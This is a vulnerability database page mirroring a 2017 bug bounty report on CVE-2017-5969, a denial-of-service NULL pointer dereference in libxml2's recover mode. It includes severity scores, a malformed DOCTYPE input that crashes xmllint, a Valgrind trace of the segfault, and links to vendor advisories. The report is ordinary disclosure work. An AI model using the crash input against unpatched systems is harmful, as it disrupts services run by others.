Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
hackeroneGeeknikH1:262665
HistoryAug 23, 2017 - 6:59 p.m.

Internet Bug Bounty: CVE-2017-5969: libxml2 when used in recover mode, allows remote attackers to cause a denial of service (NULL pointer dereference)

2017-08-2318:59:34
geeknik
hackerone.com
26

4.7 Medium

CVSS3

Attack Vector

LOCAL

Attack Complexity

HIGH

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

HIGH

CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H

2.6 Low

CVSS2

Access Vector

NETWORK

Access Complexity

HIGH

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:H/Au:N/C:N/I:N/A:P

0.004 Low

EPSS

Percentile

68.8%

JSON

I first reported this bug to the developers on 20 November 2015. A patch was finally committed on 7 June 2017 here. The caveat here is that this only happens in recover mode which the developers say no sane person should ever use in production and/or against untrusted inputs. A CVE was assigned in April 2017.

The original crash involved some memory corruption which lead to a null pointer dereference and subsequent segfault after running ./xmllint --recover against XML similar to <!DOCTYPE[<!ELEMENT l((|s)>.

test00.xml:1: parser error : xmlParseDocTypeDecl : no DOCTYPE name !
<!DOCTYPE[<?l?><!ELEMENT�(�,()>
         ^
test00.xml:1: parser error : Space required after 'ELEMENT'
<!DOCTYPE[<?l?><!ELEMENT�(�,()>
                        ^
test00.xml:1: parser error : Input is not proper UTF-8, indicate encoding !
Bytes: 0xDF 0x28 0xE2 0x2C
<!DOCTYPE[<?l?><!ELEMENT�(�,()>
                        ^
test00.xml:1: parser error : Space required after the element name
<!DOCTYPE[<?l?><!ELEMENT�(�,()>
                         ^
test00.xml:1: parser error : ContentDecl : Name or '(' expected
<!DOCTYPE[<?l?><!ELEMENT�(�,()>
                             ^
test00.xml:1: parser error : internal error: xmlParseInternalSubset: error detected in Markup declaration

<!DOCTYPE[<?l?><!ELEMENT�(�,()>
                               ^
test00.xml:1: parser error : DOCTYPE improperly terminated
<!DOCTYPE[<?l?><!ELEMENT�(�,()>
                               ^
==100630== Conditional jump or move depends on uninitialised value(s)
==100630==    at 0x452A72: xmlNextChar (parserInternals.c:535)
==100630==    by 0x4CF45F: xmlParseInternalSubset (parser.c:8460)
==100630==    by 0x4E655D: xmlParseDocument (parser.c:10852)
==100630==    by 0x50657F: xmlDoRead (parser.c:15340)
==100630==    by 0x50657F: xmlReadFile (parser.c:15402)
==100630==    by 0x41CD6F: parseAndPrintFile (xmllint.c:2401)
==100630==    by 0x410409: main (xmllint.c:3759)
==100630== 
==100630== Conditional jump or move depends on uninitialised value(s)
==100630==    at 0x452E0C: xmlNextChar (parserInternals.c:538)
==100630==    by 0x4CF45F: xmlParseInternalSubset (parser.c:8460)
==100630==    by 0x4E655D: xmlParseDocument (parser.c:10852)
==100630==    by 0x50657F: xmlDoRead (parser.c:15340)
==100630==    by 0x50657F: xmlReadFile (parser.c:15402)
==100630==    by 0x41CD6F: parseAndPrintFile (xmllint.c:2401)
==100630==    by 0x410409: main (xmllint.c:3759)
==100630== 
==100630== Conditional jump or move depends on uninitialised value(s)
==100630==    at 0x452EE3: xmlNextChar (parserInternals.c:540)
==100630==    by 0x4CF45F: xmlParseInternalSubset (parser.c:8460)
==100630==    by 0x4E655D: xmlParseDocument (parser.c:10852)
==100630==    by 0x50657F: xmlDoRead (parser.c:15340)
==100630==    by 0x50657F: xmlReadFile (parser.c:15402)
==100630==    by 0x41CD6F: parseAndPrintFile (xmllint.c:2401)
==100630==    by 0x410409: main (xmllint.c:3759)
==100630== 
==100630== Conditional jump or move depends on uninitialised value(s)
==100630==    at 0x4D39A7: xmlParseMisc (parser.c:10723)
==100630==    by 0x4E6197: xmlParseDocument (parser.c:10872)
==100630==    by 0x50657F: xmlDoRead (parser.c:15340)
==100630==    by 0x50657F: xmlReadFile (parser.c:15402)
==100630==    by 0x41CD6F: parseAndPrintFile (xmllint.c:2401)
==100630==    by 0x410409: main (xmllint.c:3759)
==100630== 
==100630== Conditional jump or move depends on uninitialised value(s)
==100630==    at 0x4D39FA: xmlParseMisc (parser.c:10726)
==100630==    by 0x4E6197: xmlParseDocument (parser.c:10872)
==100630==    by 0x50657F: xmlDoRead (parser.c:15340)
==100630==    by 0x50657F: xmlReadFile (parser.c:15402)
==100630==    by 0x41CD6F: parseAndPrintFile (xmllint.c:2401)
==100630==    by 0x410409: main (xmllint.c:3759)
==100630== 
==100630== Conditional jump or move depends on uninitialised value(s)
==100630==    at 0x4D3A3F: xmlParseMisc (parser.c:10726)
==100630==    by 0x4E6197: xmlParseDocument (parser.c:10872)
==100630==    by 0x50657F: xmlDoRead (parser.c:15340)
==100630==    by 0x50657F: xmlReadFile (parser.c:15402)
==100630==    by 0x41CD6F: parseAndPrintFile (xmllint.c:2401)
==100630==    by 0x410409: main (xmllint.c:3759)
==100630== 
test00.xml:1: parser error : internal error: Huge input lookup
==100630== Conditional jump or move depends on uninitialised value(s)
==100630==    at 0x445E2C: xmlParserPrintFileContextInternal (error.c:184)
==100630==    by 0x448B99: xmlReportError (error.c:404)
==100630==    by 0x44FB9C: __xmlRaiseError (error.c:631)
==100630==    by 0x474CA5: xmlFatalErr (parser.c:538)
==100630==    by 0x474CA5: xmlGROW (parser.c:2075)
==100630==    by 0x4E5CCF: xmlParseDocument (parser.c:10878)
==100630==    by 0x50657F: xmlDoRead (parser.c:15340)
==100630==    by 0x50657F: xmlReadFile (parser.c:15402)
==100630==    by 0x41CD6F: parseAndPrintFile (xmllint.c:2401)
==100630==    by 0x410409: main (xmllint.c:3759)
==100630== 
==100630== Conditional jump or move depends on uninitialised value(s)
==100630==    at 0x445E6C: xmlParserPrintFileContextInternal (error.c:184)
==100630==    by 0x448B99: xmlReportError (error.c:404)
==100630==    by 0x44FB9C: __xmlRaiseError (error.c:631)
==100630==    by 0x474CA5: xmlFatalErr (parser.c:538)
==100630==    by 0x474CA5: xmlGROW (parser.c:2075)
==100630==    by 0x4E5CCF: xmlParseDocument (parser.c:10878)
==100630==    by 0x50657F: xmlDoRead (parser.c:15340)
==100630==    by 0x50657F: xmlReadFile (parser.c:15402)
==100630==    by 0x41CD6F: parseAndPrintFile (xmllint.c:2401)
==100630==    by 0x410409: main (xmllint.c:3759)
==100630== 
<!DOCTYPE[<?l?><!ELEMENT�(�,()>
                               ^
==100630== Conditional jump or move depends on uninitialised value(s)
==100630==    at 0x4749A8: xmlGROW (parser.c:2079)
==100630==    by 0x4E5CCF: xmlParseDocument (parser.c:10878)
==100630==    by 0x50657F: xmlDoRead (parser.c:15340)
==100630==    by 0x50657F: xmlReadFile (parser.c:15402)
==100630==    by 0x41CD6F: parseAndPrintFile (xmllint.c:2401)
==100630==    by 0x410409: main (xmllint.c:3759)
==100630== 
==100630== Conditional jump or move depends on uninitialised value(s)
==100630==    at 0x4E55FC: xmlParseDocument (parser.c:10879)
==100630==    by 0x50657F: xmlDoRead (parser.c:15340)
==100630==    by 0x50657F: xmlReadFile (parser.c:15402)
==100630==    by 0x41CD6F: parseAndPrintFile (xmllint.c:2401)
==100630==    by 0x410409: main (xmllint.c:3759)
==100630== 
test00.xml:1: parser error : Start tag expected, '<' not found
==100630== Conditional jump or move depends on uninitialised value(s)
==100630==    at 0x445E2C: xmlParserPrintFileContextInternal (error.c:184)
==100630==    by 0x448B99: xmlReportError (error.c:404)
==100630==    by 0x44FB9C: __xmlRaiseError (error.c:631)
==100630==    by 0x4E5012: xmlFatalErrMsg (parser.c:565)
==100630==    by 0x4E5012: xmlParseDocument (parser.c:10880)
==100630==    by 0x50657F: xmlDoRead (parser.c:15340)
==100630==    by 0x50657F: xmlReadFile (parser.c:15402)
==100630==    by 0x41CD6F: parseAndPrintFile (xmllint.c:2401)
==100630==    by 0x410409: main (xmllint.c:3759)
==100630== 
==100630== Conditional jump or move depends on uninitialised value(s)
==100630==    at 0x445E6C: xmlParserPrintFileContextInternal (error.c:184)
==100630==    by 0x448B99: xmlReportError (error.c:404)
==100630==    by 0x44FB9C: __xmlRaiseError (error.c:631)
==100630==    by 0x4E5012: xmlFatalErrMsg (parser.c:565)
==100630==    by 0x4E5012: xmlParseDocument (parser.c:10880)
==100630==    by 0x50657F: xmlDoRead (parser.c:15340)
==100630==    by 0x50657F: xmlReadFile (parser.c:15402)
==100630==    by 0x41CD6F: parseAndPrintFile (xmllint.c:2401)
==100630==    by 0x410409: main (xmllint.c:3759)
==100630== 
<!DOCTYPE[<?l?><!ELEMENT�(�,()>
                               ^
==100630== Invalid read of size 4
==100630==    at 0x5BD149: xmlDumpElementContent (valid.c:1181)
==100630==    by 0x5CD871: xmlDumpElementDecl (valid.c:1706)
==100630==    by 0xA06A82: xmlBufDumpElementDecl (xmlsave.c:501)
==100630==    by 0xA06A82: xmlNodeDumpOutputInternal (xmlsave.c:939)
==100630==    by 0xA06A82: xmlNodeListDumpOutput (xmlsave.c:825)
==100630==    by 0xA06A82: xmlDtdDumpOutput (xmlsave.c:749)
==100630==    by 0xA032B2: xmlDocContentDumpOutput (xmlsave.c:1234)
==100630==    by 0xA032B2: xmlSaveDoc (xmlsave.c:1936)
==100630==    by 0x416BA6: parseAndPrintFile (xmllint.c:2705)
==100630==    by 0x410409: main (xmllint.c:3759)
==100630==  Address 0x0 is not stack'd, malloc'd or (recently) free'd
==100630== 
==100630== 
==100630== Process terminating with default action of signal 11 (SIGSEGV)
==100630==  Access not within mapped region at address 0x0
==100630==    at 0x5BD149: xmlDumpElementContent (valid.c:1181)
==100630==    by 0x5CD871: xmlDumpElementDecl (valid.c:1706)
==100630==    by 0xA06A82: xmlBufDumpElementDecl (xmlsave.c:501)
==100630==    by 0xA06A82: xmlNodeDumpOutputInternal (xmlsave.c:939)
==100630==    by 0xA06A82: xmlNodeListDumpOutput (xmlsave.c:825)
==100630==    by 0xA06A82: xmlDtdDumpOutput (xmlsave.c:749)
==100630==    by 0xA032B2: xmlDocContentDumpOutput (xmlsave.c:1234)
==100630==    by 0xA032B2: xmlSaveDoc (xmlsave.c:1936)
==100630==    by 0x416BA6: parseAndPrintFile (xmllint.c:2705)
==100630==    by 0x410409: main (xmllint.c:3759)
==100630==  If you believe this happened as a result of a stack
==100630==  overflow in your program's main thread (unlikely but
==100630==  possible), you can try to increase the size of the
==100630==  main thread stack using the --main-stacksize= flag.
==100630==  The main thread stack size used in this run was 8388608.
Segmentation fault

Related

ibm 7
debiancve 1
ubuntucve 1
redhatcve 1
veracode 2
cve 1
nessus 15
prion 1
alpinelinux 1
openvas 11
photon 2
debian 1
osv 1
gentoo 1
altlinux 2
mageia 1
suse 1
apple 2
tenable 1
ibm
ibm
Security Bulletin: Vulnerability in libxml2 affects IBM Chassis Management Module (CVE-2017-5969)
2019-01-31 02:25:02
Security Bulletin: IBM Streams may be affected by XMLsoft Libxml2 vulnerabilities
2018-06-16 14:17:37
Security Bulletin: Vulnerabilities in libxml2 affect IBM BladeCenter Advanced Management Module (AMM) (CVE-2017-7376, CVE-2017-7375, CVE-2017-5969, CVE-2017-0663)
2023-04-14 14:32:25
debiancve
debiancve
CVE-2017-5969
2017-04-11 16:59:00
ubuntucve
ubuntucve
CVE-2017-5969
2017-04-11 00:00:00
redhatcve
redhatcve
CVE-2017-5969
2017-02-14 10:18:56
veracode
veracode
Denial Of Service (DoS)
2020-05-10 23:23:13
Null Pointer Dereference Through Libxml2
2017-04-12 08:23:21
cve
cve
CVE-2017-5969
2017-04-11 16:59:00
nessus
nessus
Photon OS 1.0: Libxml2 PHSA-2017-0039
2019-02-07 00:00:00
SUSE SLED12 / SLES12 Security Update : libxml2 (SUSE-SU-2017:1670-1)
2017-06-27 00:00:00
openSUSE Security Update : libxml2 (openSUSE-2017-754)
2017-07-03 00:00:00
prion
prion
Null pointer dereference
2017-04-11 16:59:00
alpinelinux
alpinelinux
CVE-2017-5969
2017-04-11 16:59:00
openvas
openvas
SUSE: Security Advisory (SUSE-SU-2017:1670-1)
2021-04-19 00:00:00
SUSE: Security Advisory (SUSE-SU-2017:1813-1)
2021-06-09 00:00:00
Debian: Security Advisory (DLA-2972-1)
2022-04-09 00:00:00
photon
photon
Home Download Photon OS User Documentation FAQ Security Advisories Related Information Lightwave - PHSA-2017-0039
2017-10-24 00:00:00
Moderate Photon OS Security Update - PHSA-2017-0079
2017-10-23 00:00:00
debian
debian
[SECURITY] [DLA 2972-1] libxml2 security update
2022-04-08 21:17:02
osv
osv
libxml2 - security update
2022-04-08 00:00:00
gentoo
gentoo
libxml2: Multiple vulnerabilities
2017-11-10 00:00:00
altlinux
altlinux
Security fix for the ALT Linux 9 package libxml2 version 1:2.9.9.0.52.f824-alt1
2019-05-22 00:00:00
Security fix for the ALT Linux 10 package libxml2 version 1:2.9.9.0.52.f824-alt1
2019-05-22 00:00:00
mageia
mageia
Updated libxml2 & perl-XML-LibXML packages fix security vulnerabilities
2018-01-03 18:50:51
suse
suse
Security update for SLES 12-SP2 Docker image (important)
2017-10-11 03:08:09
apple
apple
About the security content of macOS High Sierra 10.13.1, Security Update 2017-001 Sierra, and Security Update 2017-004 El Capitan
2017-10-31 00:00:00
About the security content of macOS High Sierra 10.13.1, Security Update 2017-001 Sierra, and Security Update 2017-004 El Capitan - Apple Support
2019-04-03 09:42:09
tenable
tenable
[R1] Nessus Network Monitor 6.2.2 Fixes Multiple Vulnerabilities
2023-06-29 10:45:47

4.7 Medium

CVSS3

Attack Vector

LOCAL

Attack Complexity

HIGH

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

HIGH

CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H

2.6 Low

CVSS2

Access Vector

NETWORK

Access Complexity

HIGH

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:H/Au:N/C:N/I:N/A:P

0.004 Low

EPSS

Percentile

68.8%

JSON
Related for H1:262665
ibm7debiancve1ubuntucve1redhatcve1veracode2cve1nessus15prion1alpinelinux1openvas11photon2debian1osv1gentoo1altlinux2mageia1suse1apple2tenable1